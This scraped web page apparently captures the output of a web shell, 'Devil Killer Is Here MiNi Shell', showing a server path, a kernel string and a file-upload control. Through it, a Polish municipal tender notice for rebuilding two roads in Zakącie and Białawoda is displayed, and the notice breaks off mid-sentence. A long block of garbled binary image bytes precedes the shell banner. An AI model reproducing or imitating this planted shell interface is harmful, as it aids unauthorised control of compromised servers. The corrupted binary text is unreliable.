JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210930/0019720801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg gminnych nr 107059L w miejscowości Zakącie oraz nr 107058L w miejscowości Białawoda </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Borzechów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019879</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Borzechów 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Borzechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-224</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@borzechow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.borzechow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg gminnych nr 107059L w miejscowości Zakącie oraz nr 107058L w miejscowości Białawoda </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9916267d-21b7-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00197208</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00047943/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa dróg gminnych nr 107059L w miejscowości Zakącie oraz nr 107058L w miejscowości Białawoda</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/borzechow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/borzechow; https://borzechow.e-biuletyn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę,<br/>a także oświadczenie o jakim mowa w SWZ składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym. 2. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z<br/>Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram<br/>Interoperacyjności,minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej<br/>Rozporządzeniem KRI. 3.Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp., podmiotowe<br/>środki dowodowe,pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w<br/>postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach pdf .doc<br/>.docx.xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. 4. W celu ewentualnej kompresji<br/>danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: a) .zip, b) .7Z 5. UWAGA !!!<br/>Wśród rozszerzeń powszechnych a niewystępujących w Rozporządzeniu KRI występują: .rar .gif<br/>.bmp.numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>6.Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują elektronicznie za<br/>pomocą platforma zakupowa.pl (dalej jako „Platforma”), dostępną pod<br/>adresem:https://platformazakupowa.pl/pn/borzechow i formularza „Wyślij wiadomość do<br/>zamawiającego” dostępnego na stronie dotyczącej danego postępowania (nie dotyczy składania ofert).<br/>7. Korzystanie z platformy zakupowej przez Wykonawcę jest bezpłatne. 8. Szczegółowe informacje<br/>znajdują się w Specyfikacji Warunków Zamówienia do niniejszego postępowania. 7. Zamawiający,<br/>zgodnie z § 3 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) określa niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: 1) stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3)<br/>zainstalowana dowolna przeglądarka internetowa, nie rekomenduje się przeglądarki Internet Explorer;<br/>4)włączona obsługa JavaScript, 5)zainstalowany program Adobe Acrobat Reader lub inny obsługujący<br/>format plików .pdf,6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji<br/>sieciowej - kodowanie UTF8,7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi<br/>datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z<br/>zegarem Głównego Urzędu Miar</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO", informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Wójt Gminy Borzechów 2. Inspektorem Ochrony<br/>Danych osobowych w Urzędzie Gminy w Borzechowie jest Pani Joanna Rycaj/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Termomodernizacja budynku<br/>komunalnego w Borzechowie”<br/>3. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 11 września 2019 r. -<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), dalej „ustawa Pzp"; 4. Pani/Pana dane<br/>osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; 5. Obowiązek podania<br/>przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; 6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO; 7. Posiada Pani/Pan: na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących; na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych; na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. Nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">INFR.7234.67.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są roboty budowlane w ramach zadania inwestycyjnego pn.: „Przebudowa dróg gminnych nr 107059L w miejscowości Zakącie oraz nr 107058L w miejscowości Białawoda”. Zamówienie inwestycyjne jest częściowo finansowane ze środków pochodzących z rezerwy celowej przeznaczonej na zadania związane z usuwaniem skutków klęsk żywiołowych. <br/>2.	Wykonawca jest zobowiązany do wykonania Geodezyjnej inwentaryzacji powykonawczej oraz przekazania Zamawiającemu 1 egzemplarza Inwentaryzacji geodezyjnej powykonawczej włączonej do Państwowego Zasobu Geodezyjnego i Kartograficznego w PODGiK wraz ze stosownymi oświadczeniami geodety, w dwóch egzemplarzach.<br/>3.	Zakres zamówienia dotyczy: „Przebudowa dróg gminnych nr 107059L w miejscowości Zakącie oraz nr 107058L w miejscowości Białawoda”, która swoim zakresem obejmuje następujące elementy robót do wykonania:<br/>1) Element I: Przebudowa drogi gminnej nr 107059L od km 0+000 do km 0+300 w miejscowości Zakącie, uszkodzonej w wyniku gwałtownego spływu wód opadowych w 2021 r. <br/>2) Element II: Przebudowa drogi gminnej nr 107058L od km 0+000 do km 0+700 w miejscowości Białawoda, uszkodzonej w wyniku gwałtownego spływu wód opadowych w 2021 r.<br/>3) Element III: Przebudowa drogi gminnej nr 107058L od km 0+700 do km 0+714,40 w miejscowości Białawoda.<br/>4. Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach do SWZ, składają się na nie następujące dokumenty: <br/>1)	dokumentacja projektowa w tym projekt wykonawczy branży drogowej,<br/>2)	Specyfikacje techniczne wykonania i odbioru robót budowlanych (STWiORB),<br/>3)	Przedmiar robót,<br/>4)	Wzór umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111100-9 - Roboty w zakresie burzenia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert: cena (60%) oraz długość okresu gwarancji na<br/>wykonane roboty budowlane (40%).<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert,<br/>przyjmując zasadę, że 1% = 1 punk</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: 1)<br/>Zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w<br/>powyższym zakresie. 2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów. Zamawiający nie stawia warunku w<br/>powyższym zakresie. 3) Sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku<br/>w powyższym zakresie. 4) Zdolności technicznej lub zawodowej. Opis sposobu dokonywania<br/>oceny spełniania tego warunku: Zamawiający uzna warunek za spełniony, jeśli Wykonawca<br/>wykaże, że: a) wykonał w sposób należyty zgodnie z przepisami prawa budowlanego w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną odpowiadającą swoim<br/>rodzajem robotom budowlanym stanowiącym przedmiot zamówienia tj. polegającą na wykonaniu<br/>budowy lub przebudowy dróg o nawierzchni bitumicznej o wartości nie mniejszej niż 300 000,00<br/>zł brutto, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których roboty zostały wykonane, oraz załączeniem dowodów czy zostały należycie wykonane;<br/>Zgodnie art. 3 pkt 6 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2020 r. poz.<br/>1333 ze zm.), przez budowę rozumie się wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego. Zgodnie z art. 3 pkt<br/>7a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, przez przebudowę rozumie się wykonywanie<br/>robót budowlanych, w wyniku których następuje zmiana parametrów użytkowych lub<br/>technicznych istniejącego obiektu budowlanego, b) dysponuje lub będzie dysponować w okresie<br/>wykonywania zamówienia i skieruje do realizacji co najmniej jedną osobą na stanowisku<br/>kierownika robót – która musi posiadać uprawnienia budowlane do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności inżynieryjnej drogowej lub odpowiadające im<br/>równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących<br/>przepisów i należeć do właściwej izby samorządu zawodowego, a w przypadku Wykonawców<br/>zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej<br/>wskazanych. Uwaga: Wykonawca powinien w wykazie robót wyraźnie określić zakres robót, aby<br/>można było ustalić, czy spełnia warunek udziału w postępowaniu. W przypadku Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia lub korzystania z zasobów podmiotów<br/>trzecich na podstawie art. 118 ust. 1 ustawy Pzp minimum jeden Wykonawca lub jeden podmiot<br/>udostępniający zasoby musi posiadać pełne doświadczenie wskazane w ww. warunku udziału w<br/>postępowaniu określone powyżej w SWZ. Przez posiadanie uprawnień budowlanych<br/>wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się<br/>uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu art. 15a<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2020 r, poz. 1333 z późn. zm.) oraz<br/>przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie (nazwy<br/>specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie<br/>uprawnień budowlanych w dacie ich nadania. Wykonawca w celu wykazania spełniania<br/>warunków dot. osób - może wskazać osobę będącą obywatelem państwa członkowskiego UE,<br/>która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie,<br/>równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium<br/>Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia<br/>22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220) oraz ustawą z dnia 15 grudnia<br/>2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r.<br/>poz. 1117). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni<br/>od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>7.1) W celu potwierdzenia spełniania warunków udziału w postępowaniu: a) wykazu robót<br/>budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane<br/>(sporządzonego zgodnie z Załącznikiem do SWZ), oraz załączeniem dowodów określających, czy te<br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych<br/>dokumentów –inne odpowiednie dokumenty – w odniesieniu do warunku określonego w pkt. VII.2.4.a)<br/>SWZ, b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego<br/>zgodnie z Załącznikiem do SWZ – w odniesieniu do warunku określonego w pkt. VII.2.4.b) SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Żądanie wadium, jego wysokość oraz formy wniesienia – art. 97, art. 281 ust. 4 ustawy Pzp:<br/>1. Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości 6 000,00 zł słownie: 